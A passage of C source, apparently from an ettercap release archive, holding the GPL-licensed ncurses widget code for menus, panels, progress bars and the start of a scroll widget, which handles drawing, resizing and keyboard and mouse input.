License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* GLOBALS */ #define WDG_MENU_LEFT_PAD 1 struct wdg_key_callback { int hotkey; void (*callback)(void); }; struct wdg_menu_unit { int hotkey; char *title; char active; size_t nitems; MENU *m; WINDOW *win; ITEM **items; TAILQ_ENTRY(wdg_menu_unit) next; }; struct wdg_menu_handle { WINDOW *menu; struct wdg_menu_unit *focus_unit; TAILQ_HEAD(menu_head, wdg_menu_unit) menu_list; }; /* PROTOS */ void wdg_create_menu(struct wdg_object *wo); static int wdg_menu_destroy(struct wdg_object *wo); static int wdg_menu_resize(struct wdg_object *wo); static int wdg_menu_redraw(struct wdg_object *wo); static int wdg_menu_get_focus(struct wdg_object *wo); static int wdg_menu_lost_focus(struct wdg_object *wo); static int wdg_menu_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_menu_titles(struct wdg_object *wo); static void wdg_menu_move(struct wdg_object *wo, int key); static int wdg_menu_mouse_move(struct wdg_object *wo, struct wdg_mouse_event *mouse); static void wdg_menu_open(struct wdg_object *wo); static void wdg_menu_close(struct wdg_object *wo); static int wdg_menu_virtualize(int key); static int wdg_menu_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static int wdg_menu_shortcut(struct wdg_object *wo, int key); /*******************************************/ /* * called to create the menu */ void wdg_create_menu(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_menu"); /* set the callbacks */ wo->destroy = wdg_menu_destroy; wo->resize = wdg_menu_resize; wo->redraw = wdg_menu_redraw; wo->get_focus = wdg_menu_get_focus; wo->lost_focus = wdg_menu_lost_focus; wo->get_msg = wdg_menu_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_menu_handle)); } /* * called to destroy the menu */ static int wdg_menu_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_menu_handle, ww); struct wdg_menu_unit *mu, *old = NULL; WDG_DEBUG_MSG("wdg_menu_destroy"); /* erase the window */ wbkgd(ww->menu, COLOR_PAIR(wo->screen_color)); werase(ww->menu); wnoutrefresh(ww->menu); /* erase all the units */ TAILQ_FOREACH_SAFE(mu, &ww->menu_list, next, old) { int i = 0; /* all the items */ while (mu->items[i] != NULL) { free(item_userptr(mu->items[i])); free_item(mu->items[i]); i++; } TAILQ_REMOVE(&ww->menu_list, mu, next); WDG_SAFE_FREE(mu->items); WDG_SAFE_FREE(mu); } /* dealloc the structures */ delwin(ww->menu); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize the menu */ static int wdg_menu_resize(struct wdg_object *wo) { wdg_menu_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw the menu */ static int wdg_menu_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_menu_handle, ww); WDG_DEBUG_MSG("wdg_menu_redraw"); /* the window already exist */ if (ww->menu) { /* erase the border */ wbkgd(ww->menu, COLOR_PAIR(wo->screen_color)); werase(ww->menu); touchwin(ww->menu); wnoutrefresh(ww->menu); /* set the menu color */ wbkgd(ww->menu, COLOR_PAIR(wo->window_color)); /* resize the menu */ wresize(ww->menu, 1, current_screen.cols); /* redraw the menu */ wdg_menu_titles(wo); touchwin(ww->menu); /* the first time we have to allocate the window */ } else { /* create the menu window (fixed dimensions) */ if ((ww->menu = newwin(1, current_screen.cols, 0, 0)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgd(ww->menu, COLOR_PAIR(wo->window_color)); redrawwin(ww->menu); /* draw the titles */ wdg_menu_titles(wo); /* no scrolling for menu */ scrollok(ww->menu, FALSE); } /* refresh the window */ touchwin(ww->menu); wnoutrefresh(ww->menu); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the menu gets the focus */ static int wdg_menu_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_menu_redraw(wo); return WDG_E_SUCCESS; } /* * called when the menu looses the focus */ static int wdg_menu_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* close any active menu */ wdg_menu_close(wo); /* redraw the window */ wdg_menu_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the menu is focused */ static int wdg_menu_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_menu_handle, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->menu, mouse->y, mouse->x)) { wdg_set_focus(wo); /* close any previously opened menu unit */ wdg_menu_close(wo); /* if the mouse click was over a menu unit title */ if (wdg_menu_mouse_move(wo, mouse) == WDG_E_SUCCESS) wdg_menu_open(wo); /* redraw the menu */ wdg_menu_redraw(wo); } else if (ww->focus_unit->active && wenclose(ww->focus_unit->win, mouse->y, mouse->x)) { wdg_menu_driver(wo, key, mouse); } else return -WDG_E_NOTHANDLED; break; case KEY_LEFT: case KEY_RIGHT: /* move only if focused */ if (wo->flags & WDG_OBJ_FOCUSED) { /* if the menu is open, move and open the neighbor */ if (ww->focus_unit->active) { wdg_menu_close(wo); wdg_menu_move(wo, key); wdg_menu_open(wo); } else wdg_menu_move(wo, key); wdg_menu_redraw(wo); } else return -WDG_E_NOTHANDLED; break; case KEY_RETURN: case KEY_DOWN: /* move only if focused */ if (wo->flags & WDG_OBJ_FOCUSED) { /* if the menu is open */ if (ww->focus_unit->active) wdg_menu_driver(wo, key, mouse); else wdg_menu_open(wo); } else return -WDG_E_NOTHANDLED; break; case KEY_UP: /* move only if focused */ if (wo->flags & WDG_OBJ_FOCUSED) { if (wdg_menu_driver(wo, key, mouse) != WDG_E_SUCCESS) { wdg_menu_close(wo); return -WDG_E_NOTHANDLED; } } else return -WDG_E_NOTHANDLED; break; /* message not handled */ default: return wdg_menu_shortcut(wo, key); break; } return WDG_E_SUCCESS; } /* * draw the menu titles */ static void wdg_menu_titles(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_menu_handle, ww); struct wdg_menu_unit *mu; /* there is a title: print it */ if (wo->title) { /* the only alignment is RIGHT */ wmove(ww->menu, 0, current_screen.cols - strlen(wo->title) - 1); wbkgdset(ww->menu, COLOR_PAIR(wo->title_color)); wattron(ww->menu, A_BOLD); wprintw(ww->menu, wo->title); wattroff(ww->menu, A_BOLD); wbkgdset(ww->menu, COLOR_PAIR(wo->window_color)); } /* move to the left */ wmove(ww->menu, 0, WDG_MENU_LEFT_PAD); /* print the menu unit list */ TAILQ_FOREACH(mu, &ww->menu_list, next) { /* the menu is focused and the unit has the control */ if ((wo->flags & WDG_OBJ_FOCUSED) && ww->focus_unit == mu) { wattron(ww->menu, A_REVERSE); wprintw(ww->menu, "%s", mu->title); wattroff(ww->menu, A_REVERSE); } else wprintw(ww->menu, "%s", mu->title); /* separator between two unit title */ wprintw(ww->menu, " "); } } /* * add a menu to the handle */ void wdg_menu_add(struct wdg_object *wo, struct wdg_menu *menu) { WDG_WO_EXT(struct wdg_menu_handle, ww); struct wdg_menu_unit *mu; struct wdg_key_callback *kcall; int i = 0; WDG_SAFE_CALLOC(mu, 1, sizeof(struct wdg_menu_unit)); WDG_SAFE_STRDUP(mu->title, menu[i].name); /* set the shortcut */ mu->hotkey = menu[i].hotkey; while (menu[++i].name != NULL) { /* count the items added */ mu->nitems++; WDG_SAFE_REALLOC(mu->items, mu->nitems * sizeof(ITEM *)); WDG_SAFE_CALLOC(kcall, 1, sizeof(struct wdg_key_callback)); /* create the item */ mu->items[mu->nitems - 1] = new_item(menu[i].name, menu[i].shortcut); /* remember the hotkey and the callback */ kcall->hotkey = menu[i].hotkey; kcall->callback = menu[i].callback; /* this is a separator */ if (!strcmp(menu[i].name, "-")) item_opts_off(mu->items[mu->nitems - 1], O_SELECTABLE); /* set the callback */ else set_item_userptr(mu->items[mu->nitems - 1], kcall); } /* add the null termination to the array */ WDG_SAFE_REALLOC(mu->items, (mu->nitems + 1) * sizeof(ITEM *)); mu->items[mu->nitems] = NULL; /* add the menu to the list */ if (TAILQ_FIRST(&ww->menu_list) == TAILQ_END(&ww->menu_list)) { TAILQ_INSERT_HEAD(&ww->menu_list, mu, next); /* set the focus on the first unit */ ww->focus_unit = mu; } else TAILQ_INSERT_TAIL(&ww->menu_list, mu, next); } /* * move the focus thru menu units */ static void wdg_menu_move(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_menu_handle, ww); switch(key) { case KEY_RIGHT: if (ww->focus_unit != TAILQ_LAST(&ww->menu_list, menu_head)) ww->focus_unit = TAILQ_NEXT(ww->focus_unit, next); break; case KEY_LEFT: if (ww->focus_unit != TAILQ_FIRST(&ww->menu_list)) ww->focus_unit = TAILQ_PREV(ww->focus_unit, menu_head, next); break; } } /* * select the focus with a mouse event */ static int wdg_menu_mouse_move(struct wdg_object *wo, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_menu_handle, ww); struct wdg_menu_unit *mu; size_t x = WDG_MENU_LEFT_PAD; TAILQ_FOREACH(mu, &ww->menu_list, next) { /* if the mouse is over a title */ if (mouse->x >= x && mouse->x < x + strlen(mu->title) ) { ww->focus_unit = mu; return WDG_E_SUCCESS; } /* move the pointer */ x += strlen(mu->title) + 2; } return -WDG_E_NOTHANDLED; } /* * stransform keys into menu commands */ static int wdg_menu_virtualize(int key) { switch (key) { case KEY_RETURN: case KEY_EXIT: return (MAX_COMMAND + 1); case KEY_NPAGE: return (REQ_SCR_DPAGE); case KEY_PPAGE: return (REQ_SCR_UPAGE); case KEY_DOWN: return (REQ_NEXT_ITEM); case KEY_UP: return (REQ_PREV_ITEM); default: if (key != KEY_MOUSE) beep(); return (key); } } /* * sends command to the active menu */ static int wdg_menu_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_menu_handle, ww); int c; struct wdg_key_callback *kcall; /* variable currently not used */ (void) mouse; c = menu_driver(ww->focus_unit->m, wdg_menu_virtualize(key) ); /* skip non selectable items */ if ( !(item_opts(current_item(ww->focus_unit->m)) & O_SELECTABLE) ) c = menu_driver(ww->focus_unit->m, wdg_menu_virtualize(key) ); /* one item has been selected */ if (c == E_UNKNOWN_COMMAND) { /* the item is not selectable (probably selected with mouse */ if ( !(item_opts(current_item(ww->focus_unit->m)) & O_SELECTABLE) ) return WDG_E_SUCCESS; /* retrieve the function pointer */ kcall = item_userptr(current_item(ww->focus_unit->m)); /* close the menu */ wdg_menu_close(wo); /* execute the callback */ WDG_EXECUTE(kcall->callback); return WDG_E_SUCCESS; } /* tring to go outside edges */ if (c == E_REQUEST_DENIED) return -WDG_E_NOTHANDLED; wnoutrefresh(ww->focus_unit->win); return WDG_E_SUCCESS; } /* * open a menu unit */ static void wdg_menu_open(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_menu_handle, ww); struct wdg_menu_unit *mu; size_t x = WDG_MENU_LEFT_PAD; int mrows, mcols; WDG_DEBUG_MSG("wdg_menu_open"); WDG_BUG_IF(ww->focus_unit == NULL); /* already displayed */ if (ww->focus_unit->active == 1) return; /* calculate the x placement of the menu */ TAILQ_FOREACH(mu, &ww->menu_list, next) { /* search the curren focused unit */ if (!strcmp(mu->title, ww->focus_unit->title)) break; /* move the pointer */ x += strlen(mu->title) + 2; } /* create the menu */ ww->focus_unit->m = new_menu(ww->focus_unit->items); /* set the dimensions */ set_menu_format(ww->focus_unit->m, ww->focus_unit->nitems, 1); set_menu_spacing(ww->focus_unit->m, 2, 0, 0); /* get the geometry to make a window */ scale_menu(ww->focus_unit->m, &mrows, &mcols); /* check if the menu will go outside the screen on the right */ if (x + mcols + 2 > current_screen.cols) { /* * okay, we are going out of the edges... * let's align the menu with the edge */ x = current_screen.cols - (mcols + 3); } /* create the window for the menu */ ww->focus_unit->win = newwin(mrows + 2, mcols + 2, 1, x); /* set the color */ wbkgd(ww->focus_unit->win, COLOR_PAIR(wo->window_color)); keypad(ww->focus_unit->win, TRUE); box(ww->focus_unit->win, 0, 0); /* associate with the menu */ set_menu_win(ww->focus_unit->m, ww->focus_unit->win); /* the subwin for the menu */ set_menu_sub(ww->focus_unit->m, derwin(ww->focus_unit->win, mrows + 1, mcols, 1, 1)); /* menu attributes */ set_menu_mark(ww->focus_unit->m, ""); set_menu_grey(ww->focus_unit->m, COLOR_PAIR(wo->window_color)); set_menu_back(ww->focus_unit->m, COLOR_PAIR(wo->window_color)); set_menu_fore(ww->focus_unit->m, COLOR_PAIR(wo->window_color) | A_REVERSE | A_BOLD); /* display the menu */ post_menu(ww->focus_unit->m); /* set the active state */ ww->focus_unit->active = 1; wnoutrefresh(ww->focus_unit->win); } /* * close a menu unit */ static void wdg_menu_close(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_menu_handle, ww); WDG_DEBUG_MSG("wdg_menu_close"); WDG_BUG_IF(ww->focus_unit == NULL); /* nothing to clear */ if (ww->focus_unit->active == 0 || ww->focus_unit->m == NULL) return; /* hide the menu */ unpost_menu(ww->focus_unit->m); /* set the active state */ ww->focus_unit->active = 0; /* erase the menu */ wbkgd(ww->focus_unit->win, COLOR_PAIR(wo->screen_color)); werase(ww->focus_unit->win); wnoutrefresh(ww->focus_unit->win); /* delete the memory */ free_menu(ww->focus_unit->m); ww->focus_unit->m = NULL; delwin(ww->focus_unit->win); /* repaint the whole screen since a menu might have overlapped something */ wdg_redraw_all(); } /* * search in the shortcut list the key, and if found * open the corresponding menu. */ static int wdg_menu_shortcut(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_menu_handle, ww); struct wdg_menu_unit *mu; struct wdg_key_callback *kcall; /* search the shortcut in the menu unit list */ TAILQ_FOREACH(mu, &ww->menu_list, next) { int i = 0; /* first check for the menu unit */ if (mu->hotkey == key) { WDG_DEBUG_MSG("wdg_menu_shortcut: menu unit"); wdg_set_focus(wo); wdg_menu_close(wo); ww->focus_unit = mu; wdg_menu_open(wo); wdg_menu_redraw(wo); return WDG_E_SUCCESS; } /* then search in the menu items */ while (mu->items[i] != NULL) { kcall = item_userptr(mu->items[i]); i++; if (kcall == NULL) continue; /* execute the callback */ if (kcall->hotkey == key) { WDG_DEBUG_MSG("wdg_menu_shortcut: item callback"); WDG_EXECUTE(kcall->callback); return WDG_E_SUCCESS; } } } return -WDG_E_NOTHANDLED; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_panel.c000664 000000 000000 00000016255 13711276346 023463 0ustar00rootroot000000 000000 /* WDG -- panel widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define W(x) panel_window(x) /* GLOBALS */ struct wdg_panel { PANEL *win; PANEL *sub; }; /* PROTOS */ void wdg_create_panel(struct wdg_object *wo); static int wdg_panel_destroy(struct wdg_object *wo); static int wdg_panel_resize(struct wdg_object *wo); static int wdg_panel_redraw(struct wdg_object *wo); static int wdg_panel_get_focus(struct wdg_object *wo); static int wdg_panel_lost_focus(struct wdg_object *wo); static int wdg_panel_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_panel_border(struct wdg_object *wo); /*******************************************/ /* * called to create a window */ void wdg_create_panel(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_panel"); /* set the callbacks */ wo->destroy = wdg_panel_destroy; wo->resize = wdg_panel_resize; wo->redraw = wdg_panel_redraw; wo->get_focus = wdg_panel_get_focus; wo->lost_focus = wdg_panel_lost_focus; wo->get_msg = wdg_panel_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_panel)); } /* * called to destroy a window */ static int wdg_panel_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_panel, ww); WINDOW *win, *sub; WDG_DEBUG_MSG("wdg_panel_destroy"); /* erase the window */ wbkgd(W(ww->sub), COLOR_PAIR(wo->screen_color)); wbkgd(W(ww->win), COLOR_PAIR(wo->screen_color)); werase(W(ww->sub)); werase(W(ww->win)); /* dealloc the structures */ win = W(ww->win); sub = W(ww->sub); del_panel(ww->win); del_panel(ww->sub); delwin(win); delwin(sub); /* update the screen */ update_panels(); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a window */ static int wdg_panel_resize(struct wdg_object *wo) { wdg_panel_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a window */ static int wdg_panel_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_panel, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); WDG_DEBUG_MSG("wdg_panel_redraw"); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(W(ww->win), COLOR_PAIR(wo->screen_color)); werase(W(ww->win)); /* XXX - try to keep the window on screen */ if (c <= 2) c = 3; if (l <= 2) l = 3; if (x == 0) x = 1; if (y == 0) y = 1; /* resize the window and draw the new border */ WDG_MOVE_PANEL(ww->win, y, x); WDG_WRESIZE(W(ww->win), l, c); replace_panel(ww->win, W(ww->win)); wdg_panel_border(wo); /* resize the actual window and touch it */ WDG_MOVE_PANEL(ww->sub, y + 1, x + 1); WDG_WRESIZE(W(ww->sub), l - 2, c - 2); replace_panel(ww->sub, W(ww->sub)); /* set the window color */ wbkgd(W(ww->sub), COLOR_PAIR(wo->window_color)); touchwin(W(ww->sub)); /* the first time we have to allocate the window */ } else { /* create the outher window */ if ((ww->win = new_panel(newwin(l, c, y, x))) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_panel_border(wo); /* create the inner (actual) window */ if ((ww->sub = new_panel(newwin(l - 2, c - 2, y + 1, x + 1))) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgd(W(ww->sub), COLOR_PAIR(wo->window_color)); /* initialize the pointer */ wmove(W(ww->sub), 0, 0); scrollok(W(ww->sub), TRUE); /* put them ontop of the panel stack */ top_panel(ww->win); top_panel(ww->sub); } /* refresh the screen */ update_panels(); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the window gets the focus */ static int wdg_panel_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_panel_redraw(wo); return WDG_E_SUCCESS; } /* * called when the window looses the focus */ static int wdg_panel_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_panel_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the window is focused */ static int wdg_panel_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_panel, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(W(ww->win), mouse->y, mouse->x)) wdg_set_focus(wo); else return -WDG_E_NOTHANDLED; break; /* message not handled */ default: return -WDG_E_NOTHANDLED; break; } return WDG_E_SUCCESS; } /* * draw the borders and title */ static void wdg_panel_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_panel, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(W(ww->win), A_BOLD); wbkgdset(W(ww->win), COLOR_PAIR(wo->focus_color)); top_panel(ww->win); top_panel(ww->sub); } else wbkgdset(W(ww->win), COLOR_PAIR(wo->border_color)); /* draw the borders */ box(W(ww->win), 0, 0); /* set the border color */ wbkgdset(W(ww->win), COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(W(ww->win), 0, 3); break; case WDG_ALIGN_CENTER: wmove(W(ww->win), 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(W(ww->win), 0, c - strlen(wo->title) - 3); break; } wprintw(W(ww->win), wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(W(ww->win), A_BOLD); } /* * print a string in the window */ void wdg_panel_print(wdg_t *wo, size_t x, size_t y, char *fmt, ...) { WDG_WO_EXT(struct wdg_panel, ww); va_list ap; WDG_DEBUG_MSG("wdg_panel_print"); /* move the pointer */ wmove(W(ww->sub), y, x); /* print the message */ va_start(ap, fmt); vw_printw(W(ww->sub), fmt, ap); va_end(ap); update_panels(); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_percentage.c000664 000000 000000 00000020006 13711276346 024466 0ustar00rootroot000000 000000 /* WDG -- percentage widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ struct wdg_percentage { WINDOW *win; WINDOW *sub; size_t percent; char interrupt; }; /* PROTOS */ void wdg_create_percentage(struct wdg_object *wo); static int wdg_percentage_destroy(struct wdg_object *wo); static int wdg_percentage_resize(struct wdg_object *wo); static int wdg_percentage_redraw(struct wdg_object *wo); static int wdg_percentage_get_focus(struct wdg_object *wo); static int wdg_percentage_lost_focus(struct wdg_object *wo); static int wdg_percentage_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_percentage_border(struct wdg_object *wo); /*******************************************/ /* * called to create a window */ void wdg_create_percentage(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_percentage"); /* set the callbacks */ wo->destroy = wdg_percentage_destroy; wo->resize = wdg_percentage_resize; wo->redraw = wdg_percentage_redraw; wo->get_focus = wdg_percentage_get_focus; wo->lost_focus = wdg_percentage_lost_focus; wo->get_msg = wdg_percentage_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_percentage)); } /* * called to destroy a window */ static int wdg_percentage_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_percentage, ww); WDG_DEBUG_MSG("wdg_percentage_destroy"); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); wbkgd(ww->sub, COLOR_PAIR(wo->screen_color)); werase(ww->sub); werase(ww->win); wnoutrefresh(ww->sub); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->sub); delwin(ww->win); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a window */ static int wdg_percentage_resize(struct wdg_object *wo) { wdg_percentage_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a window */ static int wdg_percentage_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_percentage, ww); size_t c, l, x, y; size_t cols; /* calculate the dimension and position */ cols = strlen(wo->title) + 2; /* set the minimum */ if (cols < 45) cols = 45; /* center on the screen, but not outside the edges */ if (cols + 4 >= current_screen.cols) wo->x1 = 0; else wo->x1 = (current_screen.cols - (cols + 4)) / 2; wo->y1 = (current_screen.lines - 7) / 2; wo->x2 = -wo->x1; wo->y2 = -wo->y1; c = wdg_get_ncols(wo); l = wdg_get_nlines(wo); x = wdg_get_begin_x(wo); y = wdg_get_begin_y(wo); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_percentage_border(wo); /* resize the actual window and touch it */ mvwin(ww->sub, y + 1, x + 1); wresize(ww->sub, l - 2, c - 2); /* set the window color */ wbkgdset(ww->sub, COLOR_PAIR(wo->window_color)); /* the first time we have to allocate the window */ } else { /* create the outher window */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_percentage_border(wo); /* create the inner (actual) window */ if ((ww->sub = newwin(l - 2, c - 2, y + 1, x + 1)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgdset(ww->sub, COLOR_PAIR(wo->window_color)); werase(ww->sub); redrawwin(ww->sub); /* initialize the pointer */ wmove(ww->sub, 0, 0); scrollok(ww->sub, TRUE); } /* refresh the window */ redrawwin(ww->sub); redrawwin(ww->win); wnoutrefresh(ww->win); wnoutrefresh(ww->sub); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the window gets the focus */ static int wdg_percentage_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_percentage_redraw(wo); return WDG_E_SUCCESS; } /* * called when the window looses the focus */ static int wdg_percentage_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_percentage_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the window is focused */ static int wdg_percentage_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_percentage, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) wdg_set_focus(wo); else return -WDG_E_NOTHANDLED; break; case KEY_ESC: case CTRL('Q'): WDG_DEBUG_MSG("wdg_percentage_get_msg: user interrupt"); /* * user has requested to stop this task. * the next time the percentage will be set * the object will be destroyed and a correct value * will be returned. */ ww->interrupt = 1; break; /* message not handled */ default: return -WDG_E_NOTHANDLED; break; } return WDG_E_SUCCESS; } /* * draw the borders and title */ static void wdg_percentage_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_percentage, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { wmove(ww->sub, 1, 2); wprintw(ww->sub, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); /* draw the percentage bar */ wmove(ww->sub, 3, 2); whline(ww->sub, ACS_CKBOARD, c - 6); wbkgdset(ww->sub, COLOR_PAIR(wo->title_color)); //wattron(ww->sub, A_REVERSE); whline(ww->sub, ' ', ww->percent * (c - 6) / 100); //wattroff(ww->sub, A_REVERSE); } /* * set the percentage */ int wdg_percentage_set(wdg_t *wo, size_t p, size_t max) { WDG_WO_EXT(struct wdg_percentage, ww); /* set the percentage */ ww->percent = p * 100 / max; WDG_DEBUG_MSG("wdg_percentage_set: %d", ww->percent); wdg_percentage_redraw(wo); /* reached the max, selfdestruct */ if (p == max) { WDG_DEBUG_MSG("wdg_percentage_set: FINISHED"); wdg_destroy_object(&wo); wdg_redraw_all(); return WDG_PERCENTAGE_FINISHED; } /* user has requested to stop the task */ if (ww->interrupt) { WDG_DEBUG_MSG("wdg_percentage_set: INTERRUPTED"); ww->interrupt = 0; wdg_destroy_object(&wo); wdg_redraw_all(); return WDG_PERCENTAGE_INTERRUPTED; } return WDG_PERCENTAGE_UPDATED; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_scroll.c000664 000000 000000 00000026573 13711276346 023666 0ustar00rootroot000000 000000 /* WDG -- scroll widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ struct wdg_scroll { WINDOW *win; WINDOW *sub; size_t y_scroll; size_t y_max; }; #define WDG_PAD_REFRESH(ww, c, l, x, y) pnoutrefresh(ww->sub, ww->y_scroll + 1, 0, y + 1, x + 1, y + l - 2, x + c - 2) /* PROTOS */ void wdg_create_scroll(struct wdg_object *wo); static int wdg_scroll_destroy(struct wdg_object *wo); static int wdg_scroll_resize(struct wdg_object *wo); static int wdg_scroll_redraw(struct wdg_object *wo); static int wdg_scroll_get_focus(struct wdg_object *wo); static int wdg_scroll_lost_focus(struct wdg_object *wo); static int wdg_scroll_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_scroll_border(struct wdg_object *wo); static void wdg_set_scroll(struct wdg_object *wo, int s); static void wdg_mouse_scroll(struct wdg_object *wo, int s); /*******************************************/ /* * called to create a window */ void wdg_create_scroll(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_scroll"); /* set the callbacks */ wo->destroy = wdg_scroll_destroy; wo->resize = wdg_scroll_resize; wo->redraw = wdg_scroll_redraw; wo->get_focus = wdg_scroll_get_focus; wo->lost_focus = 